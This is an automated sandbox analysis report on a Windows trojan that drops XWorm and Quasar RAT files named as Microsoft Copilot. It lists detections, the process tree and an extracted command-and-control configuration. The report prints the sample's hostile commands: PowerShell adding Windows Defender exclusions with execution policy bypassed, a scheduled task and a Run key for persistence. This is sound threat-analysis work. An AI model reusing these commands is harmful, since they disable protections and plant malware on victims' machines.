Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PixpFUv4G7.exe

Overview

General Information

Sample name:PixpFUv4G7.exe
renamed because original name is a hash value
Original sample name:066cffd2ba05642d4bcadf466fa00ba50210b6aed526c07382924c7aaece384e.exe
Analysis ID:1527486
MD5:75c7da1457f052ae8aa48571898d4094
SHA1:b851a0ba41ced091fd775b72c91b329d387cdeff
SHA256:066cffd2ba05642d4bcadf466fa00ba50210b6aed526c07382924c7aaece384e
Tags:exeuser-Chainskilabs
Infos:

Detection

Quasar, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Quasar RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PixpFUv4G7.exe (PID: 344 cmdline: "C:\Users\user\Desktop\PixpFUv4G7.exe" MD5: 75C7DA1457F052AE8AA48571898D4094)
    • Copilot.exe (PID: 6488 cmdline: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" MD5: 34D9F35EA8D1A8C5A793D94B9FD998CB)
      • powershell.exe (PID: 7488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Copilot.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8028 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Copilot.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7712 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • unarchiver.exe (PID: 4460 cmdline: "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2)
      • 7za.exe (PID: 6592 cmdline: "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Microsoft Copilot.exe (PID: 3088 cmdline: "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe" MD5: 34D9F35EA8D1A8C5A793D94B9FD998CB)
  • Microsoft Copilot.exe (PID: 2044 cmdline: "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe" MD5: 34D9F35EA8D1A8C5A793D94B9FD998CB)
  • Microsoft Copilot.exe (PID: 5784 cmdline: "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe" MD5: 34D9F35EA8D1A8C5A793D94B9FD998CB)
  • Microsoft Copilot.exe (PID: 4008 cmdline: "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe" MD5: 34D9F35EA8D1A8C5A793D94B9FD998CB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["content-portion.gl.at.ply.gg"], "Port": "47900", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dllJoeSecurity_QuasarYara detected Quasar RATJoe Security
    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dllMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth
    • 0xce93:$x1: Quasar.Common.Messages
    • 0xdc21:$x1: Quasar.Common.Messages
    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Profiles\Default.xmlJoeSecurity_QuasarYara detected Quasar RATJoe Security
      C:\Users\user\AppData\Local\Temp\Copilot.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Local\Temp\Copilot.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          Click to see the 13 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xea0f:$s6: VirtualBox
            • 0xe96d:$s8: Win32_ComputerSystem
            • 0xfe24:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0xfec1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0xffd6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xf73c:$cnc4: POST / HTTP/1.1
            00000001.00000002.2504673520.0000000002BB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0xe7c7:$s6: VirtualBox
                • 0xe725:$s8: Win32_ComputerSystem
                • 0xfbdc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0xfc79:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0xfd8e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xf4f4:$cnc4: POST / HTTP/1.1
                Click to see the 2 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                1.0.Copilot.exe.960000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  1.0.Copilot.exe.960000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    1.0.Copilot.exe.960000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xe9c7:$s6: VirtualBox
                    • 0xe925:$s8: Win32_ComputerSystem
                    • 0xfddc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0xfe79:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0xff8e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0xf6f4:$cnc4: POST / HTTP/1.1

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: New RUN Key Pointing to Suspicious Folder
                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Copilot.exe, ProcessId: 6488, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Copilot
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Copilot.exe, ParentProcessId: 6488, ParentProcessName: Copilot.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', ProcessId: 7488, ProcessName: powershell.exe
                    Sigma detected: Script Interpreter Execution From Suspicious Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Copilot.exe, ParentProcessId: 6488, ParentProcessName: Copilot.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', ProcessId: 7488, ProcessName: powershell.exe
                    Sigma detected: Suspicious Script Execution From Temp Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Copilot.exe, ParentProcessId: 6488, ParentProcessName: Copilot.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', ProcessId: 7488, ProcessName: powershell.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Copilot.exe, ParentProcessId: 6488, ParentProcessName: Copilot.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', ProcessId: 7488, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Copilot.exe, ProcessId: 6488, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Copilot
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Copilot.exe, ParentProcessId: 6488, ParentProcessName: Copilot.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', ProcessId: 7488, ProcessName: powershell.exe
                    Sigma detected: Startup Folder File Write
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Copilot.exe, ProcessId: 6488, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Copilot.lnk
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Copilot.exe, ParentProcessId: 6488, ParentProcessName: Copilot.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe", ProcessId: 7712, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Copilot.exe, ParentProcessId: 6488, ParentProcessName: Copilot.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe", ProcessId: 7712, ProcessName: schtasks.exe
                    Sigma detected: Use Short Name Path in Command Line
                    Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Copilot.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Copilot.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Copilot.exe, ParentCommandLine: "C:\Users\user\Desktop\PixpFUv4G7.exe", ParentImage: C:\Users\user\Desktop\PixpFUv4G7.exe, ParentProcessId: 344, ParentProcessName: PixpFUv4G7.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , ProcessId: 6488, ProcessName: Copilot.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Copilot.exe, ParentProcessId: 6488, ParentProcessName: Copilot.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', ProcessId: 7488, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T00:54:49.015016+020028559241Malware Command and Control Activity Detected192.168.2.749973147.185.221.2147900TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: PixpFUv4G7.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeAvira: detection malicious, Label: TR/Spy.Gen
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeAvira: detection malicious, Label: TR/Spy.Gen
                    Found malware configuration
                    Source: 00000001.00000002.2504673520.0000000002BB1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["content-portion.gl.at.ply.gg"], "Port": "47900", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeReversingLabs: Detection: 84%
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeReversingLabs: Detection: 84%
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exeReversingLabs: Detection: 52%
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dllReversingLabs: Detection: 79%
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.binReversingLabs: Detection: 72%
                    Multi AV Scanner detection for submitted file
                    Source: PixpFUv4G7.exeReversingLabs: Detection: 71%
                    Yara detected Quasar RAT
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Profiles\Default.xml, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPED
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: PixpFUv4G7.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 1.0.Copilot.exe.960000.0.unpackString decryptor: content-portion.gl.at.ply.gg
                    Source: 1.0.Copilot.exe.960000.0.unpackString decryptor: 47900
                    Source: 1.0.Copilot.exe.960000.0.unpackString decryptor: <123456789>
                    Source: 1.0.Copilot.exe.960000.0.unpackString decryptor: <Xwormmm>
                    Source: 1.0.Copilot.exe.960000.0.unpackString decryptor: Ratted
                    Source: 1.0.Copilot.exe.960000.0.unpackString decryptor: USB.exe
                    Source: 1.0.Copilot.exe.960000.0.unpackString decryptor: %Temp%
                    Source: 1.0.Copilot.exe.960000.0.unpackString decryptor: Microsoft Copilot.exe
                    Source: PixpFUv4G7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                    Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
                    Source: Binary string: 10/06/2024 6:53 PM: File is empty: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: -QlONC:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: -Ql^]File is empty: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: -Qlts10/06/2024 6:53 PM: File is empty: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\src\TestFramework\Extension.Desktop\obj\Release\Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.pdb source: Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.dll.4.dr
                    Source: Binary string: D:\a\_work\1\s\src\Adapter\MSTest.CoreAdapter\obj\Release\Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.pdb source: Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.dll.4.dr
                    Source: Binary string: C:\projects\globalmousekeyhook\MouseKeyHook\obj\Debug\Gma.System.MouseKeyHook.pdb source: Gma.System.MouseKeyHook.dll.4.dr
